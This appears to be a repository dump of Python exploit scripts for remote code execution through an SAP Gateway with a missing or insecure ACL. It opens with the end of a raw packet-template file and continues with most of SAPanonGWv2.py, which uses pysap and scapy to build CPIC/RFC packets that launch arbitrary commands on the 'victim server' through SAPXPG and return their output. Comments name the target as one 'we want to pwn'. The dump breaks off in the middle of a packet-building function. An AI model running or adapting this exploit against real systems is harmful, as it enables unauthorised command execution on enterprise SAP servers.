0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x02\x03\x02\x01\x00\x06\x50\x41\x52\x41\x4D\x53\x02\x01\x02\x03\x00\xFF\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x62\x02\x03\x02\x01\x00\x0A\x53\x54\x44\x45\x52\x52\x43\x4E\x54\x4C\x02\x01\x02\x03\x00\x01\x4D\x02\x03\x02\x01\x00\x09\x53\x54\x44\x49\x4E\x43\x4E\x54\x4C\x02\x01\x02\x03\x00\x01\x52\x02\x03\x02\x01\x00\x0A\x53\x54\x44\x4F\x55\x54\x43\x4E\x54\x4C\x02\x01\x02\x03\x00\x01\x4D\x02\x03\x02\x01\x00\x08\x54\x45\x52\x4D\x43\x4E\x54\x4C\x02\x01\x02\x03\x00\x01\x43\x02\x03\x02\x01\x00\x09\x54\x52\x41\x43\x45\x43\x4E\x54\x4C\x02\x01\x02\x03\x00\x01\x36\x02\x03\x03\x01\x00\x03\x4C\x4F\x47\x03\x01\x03\x30\x00\x04\x00\x00\x00\x01\x03\x30\x03\x02\x00\x08\x00\x00\x00\x80\x00\x00\x00\x00\x03\x02\x01\x04\x01\x16\x10\x04\x02\x00\x0C\x00\x01\x87\x68\x00\x00\x04\x4C\x00\x00\x0B\xB8\x10\x04\x0B\x00\x20\xFF\x7F\xFA\x0D\x78\xB7\x37\xDE\xF6\x19\x6E\x93\x25\xBF\x15\x93\xEF\x73\xFE\xEB\xDB\x51\xED\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x04\x04\x00\x08\x00\x16\x00\x07\x00\x10\x00\x07\x10\x04\x0D\x00\x10\x00\x00\x00\x27\x00\x00\x01\x0C\x00\x00\x00\x35\x00\x00\x01\x0C\x10\x04\x16\x00\x02\x00\x11\x10\x04\x17\x00\x02\x00\x22\x10\x04\x19\x00\x02\x00\x00\x10\x04\x1E\x00\x08\x00\x00\x03\x67\x00\x00\x07\x58\x10\x04\x25\x00\x02\x00\x01\x10\x04\x09\x00\x03\x37\x32\x30\x10\x04\x1D\x00\x01\x30\x10\x04\x1F\x00\x28\x57\x69\x6E\x64\x6F\x77\x73\x20\x37\x20\x50\x72\x6F\x66\x65\x73\x73\x69\x6F\x6E\x61\x6C\x20\x36\x2E\x31\x20\x28\x37\x36\x30\x31\x29\x20\x53\x65\x72\x76\x69\x63\x10\x04\x20\x00\x12\x49\x45\x20\x39\x2E\x31\x30\x2E\x39\x32\x30\x30\x2E\x31\x36\x36\x31\x38\x10\x04\x21\x00\x09\x4F\x66\x66\x69\x63\x65\x20\x31\x32\x10\x04\x24\x00\x08\x00\x00\x04\x1A\x00\x00\x07\x80\x10\x04\x13\x00\x23\x02\xE1\xD4\x81\xE3\x0B\x21\xF1\x01\xA0\x0A\x00\x0C\x29\x00\x99\xD0\x01\x37\xD5\x81\xE3\x88\x9A\xF1\x6B\xA0\x0A\x00\x0C\x29\x00\x99\xD0\x00\x01\x04\xFF\xFF\x00\x00\xFF\xFF\x00\x00\x09\xCC\x00\x00\x6D\x60", 70 | "\x00\x00\x02\x31\x06\xCB\x03\x00\x00\x13\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xF4\x00\x00\x00\x00\x00\x00\x08\x00\x00\x85\x0C\x00\x00\x00\x00\x00\x00\x00\x00\x39\x33\x32\x30\x31\x38\x37\x35\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x01\x36\x00\x25\x01\x00\x0C\x29\x00\x99\xD0\x1E\xE3\xA0\xBA\x9A\xEC\xEA\x55\x80\x0A\x4E\xD5\x81\xE3\x09\xF6\xF1\x18\xA0\x0A\x00\x0C\x29\x00\x99\xD0\x00\x00\x00\x02\x01\x36\x05\x02\x00\x00\x05\x02\x00\x0B\x00\x03\x37\x33\x31\x00\x0B\x01\x02\x00\x0E\x53\x41\x50\x58\x50\x47\x5F\x45\x4E\x44\x5F\x58\x50\x47\x01\x02\x05\x03\x00\x00\x05\x03\x05\x14\x00\x10\xE3\x81\xD5\x4E\xF6\x09\x19\xF1\xA0\x0A\x00\x0C\x29\x00\x99\xD0\x05\x14\x04\x20\x00\x04\x00\x00\x00\x00\x04\x20\x05\x12\x00\x00\x05\x12\x02\x05\x00\x08\x45\x58\x49\x54\x43\x4F\x44\x45\x02\x05\x02\x05\x00\x08\x45\x58\x49\x54\x53\x54\x41\x54\x02\x05\x03\x01\x00\x03\x4C\x4F\x47\x03\x01\x03\x30\x00\x04\x00\x00\x00\x01\x03\x30\x03\x02\x00\x08\x00\x00\x00\x80\x00\x00\x00\x00\x03\x02\x01\x04\x01\x16\x10\x04\x02\x00\x0C\x00\x01\x87\x68\x00\x00\x04\x4C\x00\x00\x0B\xB8\x10\x04\x0B\x00\x20\xFF\x7F\xFA\x0D\x78\xB7\x37\xDE\xF6\x19\x6E\x93\x25\xBF\x15\x93\xEF\x73\xFE\xEB\xDB\x51\xED\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x04\x04\x00\x08\x00\x16\x00\x07\x00\x10\x00\x07\x10\x04\x0D\x00\x10\x00\x00\x00\x27\x00\x00\x01\x0C\x00\x00\x00\x35\x00\x00\x01\x0C\x10\x04\x16\x00\x02\x00\x11\x10\x04\x17\x00\x02\x00\x22\x10\x04\x19\x00\x02\x00\x00\x10\x04\x1E\x00\x08\x00\x00\x03\x67\x00\x00\x07\x58\x10\x04\x25\x00\x02\x00\x01\x10\x04\x09\x00\x03\x37\x32\x30\x10\x04\x1D\x00\x01\x30\x10\x04\x1F\x00\x28\x57\x69\x6E\x64\x6F\x77\x73\x20\x37\x20\x50\x72\x6F\x66\x65\x73\x73\x69\x6F\x6E\x61\x6C\x20\x36\x2E\x31\x20\x28\x37\x36\x30\x31\x29\x20\x53\x65\x72\x76\x69\x63\x10\x04\x20\x00\x12\x49\x45\x20\x39\x2E\x31\x30\x2E\x39\x32\x30\x30\x2E\x31\x36\x36\x31\x38\x10\x04\x21\x00\x09\x4F\x66\x66\x69\x63\x65\x20\x31\x32\x10\x04\x24\x00\x08\x00\x00\x04\x1A\x00\x00\x07\x80\x10\x04\x13\x00\x23\x02\xE1\xD4\x81\xE3\x0B\x21\xF1\x01\xA0\x0A\x00\x0C\x29\x00\x99\xD0\x01\x37\xD5\x81\xE3\x88\x9A\xF1\x6B\xA0\x0A\x00\x0C\x29\x00\x99\xD0\x00\x01\x04\xFF\xFF\x00\x00\xFF\xFF\x00\x00\x01\xD9\x00\x00\x6D\x60"] 71 | 72 | 73 | 74 | def run_cmd(): # execute cmd on the victim server 75 | print "[*] sending cmd:" + args.cmd 76 | if args.old: 77 | return RCE_gw_for_old_sustems() # via gateway for old systems 78 | return RCE_gw() # via gateway 79 | 80 | 81 | def RCE_gw(): # RCE via GW 82 | c = args.cmd.split() 83 | param = args.cmd[len(c[0]) + 1:] 84 | cmd = c[0] 85 | result = exploit(cmd, param) 86 | if args.verb: 87 | print "[DBG] Run command:" + cmd + " " + param 88 | print "[*] Command result:" + trim_r(result) 89 | return trim_r(result) 90 | 91 | 92 | def RCE_gw_for_old_sustems(): # RCE via GW for old systems ~640 93 | param = "" 94 | result = exploit(args.cmd, param) 95 | if args.verb: 96 | print "[DBG] Run command:" + args.cmd + " " + param 97 | print "[*] Command result:" + trim_r(result) 98 | return trim_r(result) 99 | 100 | 101 | def exploit(cmd, param): # create RCE request 102 | tmp = exploit_p[2] 103 | tmp1 = exploit_p[3] 104 | tmp = tmp.replace("a" * 128, space_fill(cmd, 1)) # insert command 105 | tmp = tmp.replace("b" * 255, space_fill(param, 2)) # insert param 106 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 107 | s.connect((args.target, args.port)) 108 | send_req(s, exploit_p[0]) 109 | conversation = re.search(ur"\d{8}", send_req(s, exploit_p[1])) 110 | send_req(s, tmp.replace("93201875", conversation.group())) 111 | result = send_req(s, tmp1.replace("93201875", conversation.group())) 112 | s.close() 113 | return result 114 | 115 | 116 | def trim_r(str): # trim a trash form the server response 117 | str_begin = str.find("\x02\x03\x04\x00") + 5 118 | str_end = str.find("\x20\x03\x04\x03\x36") 119 | if str_begin < 20: 120 | if args.verb: 121 | print "[!] Packet compression. Not supported." 122 | return '' 123 | if str_begin == -1: 124 | print "[!] Problem with server response parsing." 125 | print "[!] It's probably a size issue and server compressed it." 126 | return '' 127 | if str_end == -1: 128 | print "[!] End marker not detected. Cutting at the end." 129 | return str[str_begin:].replace('\x20\x03\x04\x03\x04\x00', '\n') 130 | return str[str_begin:str_end].replace('\x20\x03\x04\x03\x04\x00', '\n') 131 | 132 | 133 | def send_req(s, message): # send requests 134 | MESSAGE = message 135 | s.send(MESSAGE) 136 | data = s.recv(8192) 137 | if args.verb == 1: 138 | print "[DBG] Received data:", data 139 | return data 140 | 141 | 142 | def space_fill(inpt, what): # fill packets by \x20 143 | cmd_name_buff = 128 144 | param_buff = 255 145 | if what == 1: # cmd name 146 | nop_cnt = cmd_name_buff - len(inpt) 147 | inpt = inpt + nop_cnt * "\x20" 148 | return inpt 149 | elif what == 2: # param 150 | nop_cnt = param_buff - len(inpt) 151 | inpt = inpt + nop_cnt * "\x20" 152 | return inpt 153 | 154 | 155 | print run_cmd() -------------------------------------------------------------------------------- /SAPanonGWv2.py: -------------------------------------------------------------------------------- 1 | 2 | #!/usr/bin/env python 3 | # Dmitry @_chipik Chastuhin 4 | 5 | from pysap.SAPRFC import SAPRFC, SAPRFCDTStruct, SAPCPIC, SAPRFCTHStruct, SAPRFXPG, SAPCPICSUFFIX, cpic_padd, SAPCPICPARAM, SAPCPICPARAM2, SAPRFCEXTEND, SAPCPIC2, SAPRFXPG_END 6 | from ansicolor import red, green, blue, yellow, cyan, magenta 7 | from pysap.SAPNI import SAPNI, SAPNIStreamSocket 8 | from pysap.SAPDiag import SAPDiag, SAPDiagItem 9 | from scapy.supersocket import StreamSocket 10 | from scapy.layers.inet import TCP 11 | from scapy.packet import bind_layers, Raw 12 | from scapy.all import hexdump, raw 13 | from scapy.config import conf 14 | from struct import * 15 | import argparse 16 | import logging 17 | import socket 18 | import sys 19 | 20 | help_desc = ''' 21 | RCE via SAP GW when GW ACL sec_info missed (gw/acl_mode = 0) or has insecure configuration 22 | -- chipik 23 | ''' 24 | 25 | #####GLOBAL VALUES 26 | 27 | cmd_lparams='' 28 | cmd_params='' 29 | 30 | # that's our target we want to pwn 31 | attacked_gw = {"ip": '127.0.0.1', 32 | "gwport": 3300, 33 | "sid": 'DEV', 34 | "instance": '00', 35 | "hostname": 'NW703trial', 36 | "dest_name": 'T_75', 37 | "cli_nbr": '001', 38 | "kernel": '720' 39 | } 40 | 41 | ########## 42 | def build_p1(ip, inbr): 43 | p1 = SAPRFC(version=2, 44 | req_type='GW_NORMAL_CLIENT', 45 | address=ip, 46 | service='sapgw{}'.format(inbr), 47 | codepage=4103, 48 | lu='sapserve', 49 | tp='sapgw{}'.format(inbr), 50 | conversation_id=' ' * 8, 51 | appc_header_version=6, 52 | accept_info='EINFO+PING+CONN_EINFO', 53 | idx=-1, 54 | ) 55 | return p1 56 | 57 | 58 | def build_p2(): 59 | dt_structure = SAPRFCDTStruct(version=96, 60 | padd1='\x00\x00\x00\x00\x00\x00\x00\x00', 61 | root_id='\x0E\x02\x00\x00\x00\x00\xE8\x4D\x23\x00\xDF\x07\x00\x00\x01\x00', 62 | conn_id='\x4E\xD5\x81\xE3\x09\xF6\xF1\x18\xA0\x0A\x00\x0C\x29\x00\x99\xD0', 63 | conn_id_suff=0, 64 | timeout=-1, 65 | keepalive_timeout=-1, 66 | export_trace=2, 67 | start_type='DEFAULT', 68 | net_protocol=10, 69 | local_addrv6='::{}'.format(attacked_gw['ip']), 70 | long_lu=attacked_gw['ip'], 71 | padd3='\x00' * 16, 72 | user='SAP*', 73 | padd4='\x20' * 8, 74 | padd5='\x00' * 4, 75 | padd6='\x20' * 12, 76 | padd7='\x00' * 16, 77 | addr_ipv4=attacked_gw['ip'], 78 | padd8='\x00' * 4, 79 | long_tp='sapxpg', 80 | ) 81 | 82 | ext_inf = SAPRFCEXTEND(short_dest_name=attacked_gw['dest_name'], 83 | ncpic_lu='172.16.0', 84 | ncpic_tp='sapxpg', 85 | ctype='STARTED_PRG', 86 | clientInfo=1, 87 | ncpic_parameters_padd='\x00\x00', 88 | comm_idx=0, 89 | conn_idx=65535, 90 | ) 91 | 92 | p2 = SAPRFC(version=6, 93 | func_type='F_SAP_INIT', 94 | protocol='CPIC', 95 | mode=0, 96 | uid=19, 97 | gw_id=65535, 98 | err_len=0, 99 | info2='WITH_LONG_LU_NAME', 100 | trace_level=0, 101 | time=0, 102 | info3='GW_EXTENDED_INIT_OPTIONS+GW_DIST_TRACE', 103 | timeout=-1, 104 | info4=0, 105 | seq_no=0, 106 | sap_param_len=len(dt_structure), 107 | info='SYNC_CPIC_FUNCTION+WITH_HOSTADDR+WITH_GW_SAP_PARAMS_HDR+R3_CPIC_LOGIN_WITH_TERM', 108 | padd_appc=0, 109 | vector=0, 110 | appc_rc='CM_OK', 111 | sap_rc=0, 112 | sap_ext_header =ext_inf, 113 | sap_param=dt_structure, 114 | ) 115 | #p2.show2() 116 | return p2 117 | 118 | 119 | def buld_p3(conv_id): 120 | 121 | cpic_suf = SAPCPICSUFFIX( 122 | suff_padd1='\x10\x04\x02', 123 | suff_unk1='\x00\x01\x87\x68\x00\x00\x04\x4c\x00\x00\x0b\xb8', 124 | suff_padd2='\x10\x04\x0b', 125 | suff_unk2='\xff\x7f\xfa\x0d\x78\xb7\x27\xde\xf6\x19\x62\x93\x25\xbf\x15\x93\xef\x73\xfe\xeb\xdb\x51\xed\x00\x00\x00\x00\x00\x00\x00\x00\x00', 126 | suff_padd3='\x10\x04\x04', 127 | suff_unk3='\x00\x16\x00\x07\x00\x10\x00\x07', 128 | suff_padd4='\x10\x04\x0d', 129 | suff_unk4='\x00\x00\x00\x27\x00\x00\x01\x0c\x00\x00\x00\x35\x00\x00\x01\x0c', 130 | suff_padd5='\x10\x04\x16', 131 | suff_unk5='\x00\x11', 132 | suff_padd6='\x10\x04\x17', 133 | suff_unk6='\x00\x22', 134 | suff_padd7='\x10\x04\x19', 135 | suff_unk7='\x00\x00', 136 | suff_padd8='\x10\x04\x1e', 137 | suff_unk8='\x00\x00\x03\x67\x00\x00\x07\x58', 138 | suff_padd9='\x10\x04\x25', 139 | suff_unk9='\x00\x01', 140 | suff_padd10k='\x10\x04\x09', 141 | suff_kernel=attacked_gw['kernel'], 142 | suff_padd10='\x10\x04\x1d', 143 | suff_unk10='\x30', 144 | suff_padd11='\x10\x04\x1f', 145 | suff_cli1='Windows 7 Professional 6.1 (7601) Servic', 146 | suff_padd12='\x10\x04\x20', 147 | suff_cli2='IE 9.10.9200.16618', 148 | suff_padd13='\x10\x04\x21', 149 | suff_cli3='Office 12', 150 | suff_padd14='\x10\x04\x24', 151 | suff_unk14='\x00\x00\x04\x1a\x00\x00\x07\x80', 152 | suff_padd15='\x10\x04\x13', 153 | suff_unk15='\x02\xe1\xd4\x81\xe3\x0b\x21\xf1\x01\xa0\x0a\x00\x0c\x29\x00\x99\xd0\x01\x37\xd5\x81\xe3\x88\x9a\xf1\x6b\xa0\x0a\x00\x0c\x29\x00\x99\xd0\x00', 154 | ) 155 | 156 | xpg = SAPRFXPG( 157 | xpg_padd100='\x05\x12\x02\x05', 158 | xpg_convid_l='CONVID', 159 | xpg_padd101='\x02\x05\x02\x05', 160 | xpg_strstat_l='STRTSTAT', 161 | xpg_padd102='\x02\x05\x02\x05', 162 | xpg_xpgid_l='XPGID', 163 | xpg_padd103='\x02\x05\x02\x01', 164 | xpg_extprog_l='EXTPROG', 165 | xpg_padd104='\x02\x01\x02\x03', 166 | xpg_extprog_val='{: <128}'.format(cmd), 167 | xpg_padd105='\x02\x03\x02\x01', 168 | xpg_longparam_l='LONG_PARAMS', 169 | xpg_padd106='\x02\x01\x02\x03', 170 | xpg_longparam_val='{: <1024}'.format(cmd_lparams), 171 | xpg_padd107='\x02\x03\x02\x01', 172 | xpg_param_l='PARAMS', 173 | xpg_padd108='\x02\x01\x02\x03', 174 | xpg_param_val='{: <255}'.format(cmd_params), 175 | xpg_padd109='\x02\x03\x02\x01', 176 | xpg_stderrcntl_l='STDERRCNTL', 177 | xpg_padd110='\x02\x01\x02\x03', 178 | xpg_stderrcntl_val='M', 179 | xpg_padd111='\x02\x03\x02\x01', 180 | xpg_stdincntl_l='STDINCNTL', 181 | xpg_padd112='\x02\x01\x02\x03', 182 | xpg_stdincntl_val='R', 183 | xpg_padd113='\x02\x03\x02\x01', 184 | xpg_stdoutcntl_l='STDOUTCNTL', 185 | xpg_padd114='\x02\x01\x02\x03', 186 | xpg_stdoutcntl_val='M', 187 | xpg_padd115='\x02\x03\x02\x01', 188 | xpg_termcntl_l='TERMCNTL', 189 | xpg_padd116='\x02\x01\x02\x03', 190 | xpg_termcntl_val='C', 191 | xpg_padd117='\x02\x03\x02\x01', 192 | xpg_tracecntl_l='TRACECNTL', 193 | xpg_padd118='\x02\x01\x02\x03', 194 | xpg_tracecntl_val='6', 195 | xpg_padd119='\x02\x03\x03\x01', 196 | xpg_log_l='LOG', 197 | xpg_padd120='\x03\x01\x03\x30', 198 | xpg_log_val1='\x00\x00\x00\x01', 199 | xpg_padd121='\x03\x30\x03\x02', 200 | xpg_unk1='\x00\x00\x00\x80\x00\x00\x00\x00', 201 | ) 202 | 203 | cpic_params = SAPCPICPARAM( 204 | param1='\x00\x99\xd0\x1e', 205 | param2='\xe3\xa0\xba\x9a\xec\xea\x55\x80\x0a\x4e\xd5', 206 | param_sess_1='\x81\xe3', # session 1st part? 207 | param_sess_2='\x09\xf6\xf1\x18', # session 2nd part? 208 | mask='225.0.0.0', 209 | ip= attacked_gw['ip'], 210 | flag=1, 211 | ) 212 | 213 | cpic_params2 = SAPCPICPARAM2( #dunno why this values 214 | param1='\xe3\x81\xd5\x4e\xf6\x09\x19\xf1', 215 | mask='160.10.0.12', 216 | ip= '41.0.153.208', 217 | ) 218 | 219 | th = SAPRFCTHStruct( 220 | th_eyec1="*TH*", 221 | th_version=3, 222 | th_len=230, 223 | th_trace_flag=0, 224 | th_sysid='{}/{}_{}_{}'.format(attacked_gw["sid"], attacked_gw['hostname'], attacked_gw['sid'], attacked_gw['instance']), 225 | th_serevice=1, 226 | th_userid='SAP*', 227 | th_action='SM49', 228 | th_acttype=1, 229 | th_presysid='{}/{}_{}_{}'.format(attacked_gw["sid"], attacked_gw['hostname'], attacked_gw['sid'], attacked_gw['instance']), 230 | th_id='37D581E3889AF16DA00A000C290099D0001', 231 | th_some_cpic_params=cpic_params, 232 | th_eyec2="*TH*", 233 | 234 | ) 235 | 236 | cpic = SAPCPIC( 237 | cpic_start_padd='\x01\x01\x00\x08', 238 | cpic_cpic_length=257, 239 | 240 | cpic_padd0003="\x01\x01\x01\x01", 241 | cpic_unk02="", 242 | 243 | cpic_padd0002="\x01\x01\x01\x03", 244 | cpic_unk01="\x00\x00\x06\x1b", 245 | 246 | cpic_padd0001="\x01\x03\x01\x06", 247 | cpic_unk00="\x04\x01\x00\x03\x01\x03\x02\x00\x00\x00\x23", 248 | 249 | cpic_padd001="\x01\x06\x00\x07", 250 | cpic_ip='{: <15}'.format(attacked_gw['ip']), 251 | 252 | cpic_padd002 = '\x00\x07\x00\x18', 253 | cpic_ip2=attacked_gw['ip'], 254 | 255 | cpic_padd003 = '\x00\x18\x00\x08', 256 | cpic_host_sid_inbr='{}_{}_{}'.format(attacked_gw['hostname'], attacked_gw['sid'], attacked_gw['instance']), 257 | 258 | cpic_padd004 = '\x00\x08\x00\x11', 259 | cpic_rfc_type='3', 260 | 261 | cpic_padd005 = '\x00\x11\x00\x13', 262 | cpic_kernel1 = '{} '.format(attacked_gw['kernel']), 263 | 264 | cpic_padd006='\x00\x13\x00\x12', 265 | cpic_kernel2='{} '.format(attacked_gw['kernel']), 266 | 267 | cpic_padd007='\x00\x12\x00\x06', 268 | cpic_dest=attacked_gw['dest_name'], 269 | 270 | cpic_padd008='\x00\x06\x01\x30', 271 | cpic_program='SAPLSSXP', 272 | 273 | cpic_padd009='\x01\x30\x01\x11', 274 | cpic_username1='SAP*', 275 | 276 | cpic_padd010='\x01\x11\x01\x14', 277 | cpic_cli_nbr1=attacked_gw['cli_nbr'], 278 | 279 | cpic_padd011='\x01\x14\x01\x15', 280 | cpic_unk1='E', 281 | 282 | cpic_padd012='\x01\x15\x00\x09', 283 | cpic_username2='SAP*', 284 | 285 | cpic_padd013='\x00\x09\x01\x34', 286 | cpic_cli_nbr2=attacked_gw['cli_nbr'], 287 | 288 | cpic_padd014='\x01\x34\x05\x01', 289 | cpic_unk2='\x01', 290 | 291 | cpic_padd015_0='\x05\x01',# <---- 292 | cpic_padd015_1='\x01\x36',# <---- 293 | some_cpic_params=cpic_params, 294 | 295 | cpic_padd016='\x01\x36\x05\x02', 296 | cpic_convid_label='', 297 | 298 | cpic_padd017='\x05\x02\x00\x0b', 299 | cpic_kernel3=attacked_gw['kernel'], 300 | 301 | cpic_padd018='\x00\x0b\x01\x02', 302 | cpic_RFC_f='SAPXPG_START_XPG_LONG', 303 | 304 | cpic_padd019='\x01\x02\x05\x03', 305 | cpic_unk4='', 306 | 307 | cpic_padd020='\x05\x03\x01\x31', 308 | cpic_th_struct=th, 309 | 310 | cpic_padd021='\x01\x31\x05\x14', 311 | some_cpic_params2=cpic_params2, 312 | 313 | cpic_padd022='\x05\x14\x04\x20', 314 | cpic_unk6='\x00\x00\x00\x00', 315 | 316 | cpic_padd023='\x04\x20\x05\x12', 317 | cpic_unk7='', 318 | 319 | xpg_p=xpg, 320 | 321 | cpic_padd024='\x03\x02\x01\x04', 322 | cpic_suff=cpic_suf, 323 | 324 | cpic_end_padd = '\x01\x04\xff\xff', 325 | cpic_end = '', 326 | cpic_end_sig='\xff\xff\x00\x00', 327 | ) 328 | 329 | 330 | 331 | p3 = SAPRFC(version=6, 332 | func_type='F_SAP_SEND', 333 | protocol='CPIC', 334 | mode=0, 335 | uid=19, 336 | gw_id=1, 337 | err_len=0, 338 | info2=0, 339 | trace_level=0, 340 | time=0, 341 | info3=0, 342 | timeout=500, 343 | info4=0, 344 | seq_no=0, 345 | sap_param_len=8, 346 | padd_appc=0, 347 | info='SYNC_CPIC_FUNCTION+WITH_GW_SAP_PARAMS_HDR+R3_CPIC_LOGIN_WITH_TERM', 348 | vector='F_V_SEND_DATA+F_V_RECEIVE', 349 | appc_rc='CM_OK', 350 | sap_rc=0, 351 | conv_id=conv_id, 352 | cm_ok_padd='\x00'*31 + '\x02', 353 | sap_cpic=cpic, 354 | cpic_packet_size=len(cpic), 355 | rfc_packet_size=28000, 356 | ) 357 | 358 | #p3.show2() 359 | return p3 360 | 361 | def buld_p4(conv_id): 362 | 363 | cpic_params = SAPCPICPARAM( 364 | param1='\x00\x99\xd0\x1e', 365 | param2='\xe3\xa0\xba\x9a\xec\xea\x55\x80\x0a\x4e\xd5', 366 | param_sess_1='\x81\xe3', # session 1st part? 367 | param_sess_2='\x09\xf6\xf1\x18', # session 2nd part? 368 | mask='160.10.0.12', 369 | ip= '41.0.153.208', 370 | flag=2, 371 | ) 372 | 373 | cpic_params2 = SAPCPICPARAM2( #dunno why this values 374 | param1='\xe3\x81\xd5\x4e\xf6\x09\x19\xf1', 375 | mask='160.10.0.12', 376 | ip= '41.0.153.208', 377 | ) 378 | 379 | sap_xpg_end = SAPRFXPG_END( 380 | xpg_end_padd001='\x05\x12\x02\x05', 381 | xpg_end_ecode_l='EXITCODE', 382 | xpg_end_padd002 = '\x02\x05\x02\x05', 383 | xpg_end_estat_l = 'STRTSTAT', 384 | xpg_end_padd003 = '\x02\x05\x03\x01', 385 | xpg_end_log_l = 'LOG', 386 | xpg_end_padd004= '\x03\x01\x03\x30', 387 | xpg_end_unk1 = '\x00\x00\x00\x01', 388 | xpg_end_padd005 = '\x03\x30\x03\x02', 389 | xpg_end_unk2 = '\x00\x00\x00\x80\x00\x00\x00\x00', 390 | ) 391 | 392 | cpic_suf = SAPCPICSUFFIX( 393 | suff_padd1='\x10\x04\x02', 394 | suff_unk1='\x00\x01\x87\x68\x00\x00\x04\x4c\x00\x00\x0b\xb8', 395 | suff_padd2='\x10\x04\x0b', 396 | suff_unk2='\xff\x7f\xfa\x0d\x78\xb7\x27\xde\xf6\x19\x62\x93\x25\xbf\x15\x93\xef\x73\xfe\xeb\xdb\x51\xed\x00\x00\x00\x00\x00\x00\x00\x00\x00', 397 | suff_padd3='\x10\x04\x04', 398 | suff_unk3='\x00\x16\x00\x07\x00\x10\x00\x07', 399 | suff_padd4='\x10\x04\x0d', 400 | suff_unk4='\x00\x00\x00\x27\x00\x00\x01\x0c\x00\x00\x00\x35\x00\x00\x01\x0c', 401 | suff_padd5='\x10\x04\x16', 402 | suff_unk5='\x00\x11', 403 | suff_padd6='\x10\x04\x17', 404 | suff_unk6='\x00\x22', 405 | suff_padd7='\x10\x04\x19', 406 | suff_unk7='\x00\x00', 407 | suff_padd8='\x10\x04\x1e', 408 | suff_unk8='\x00\x00\x03\x67\x00\x00\x07\x58', 409 | suff_padd9='\x10\x04\x25', 410 | suff_unk9='\x00\x01', 411 | suff_padd10k='\x10\x04\x09', 412 | suff_kernel=attacked_gw['kernel'], 413 | suff_padd10='\x10\x04\x1d', 414 | suff_unk10='\x30', 415 | suff_padd11='\x10\x04\x1f', 416 | suff_cli1='Windows 7 Professional 6.1 (7601) Servic', 417 | suff_padd12='\x10\x04\x20', 418 | suff_cli2='IE 9.10.9200.16618', 419 | suff_padd13='\x10\x04\x21', 420 | suff_cli3='Office 12', 421 | suff_padd14='\x10\x04\x24', 422 | suff_unk14='\x00\x00\x04\x1a\x00\x00\x07\x80', 423 | suff_padd15='\x10\x04\x13', 424 | 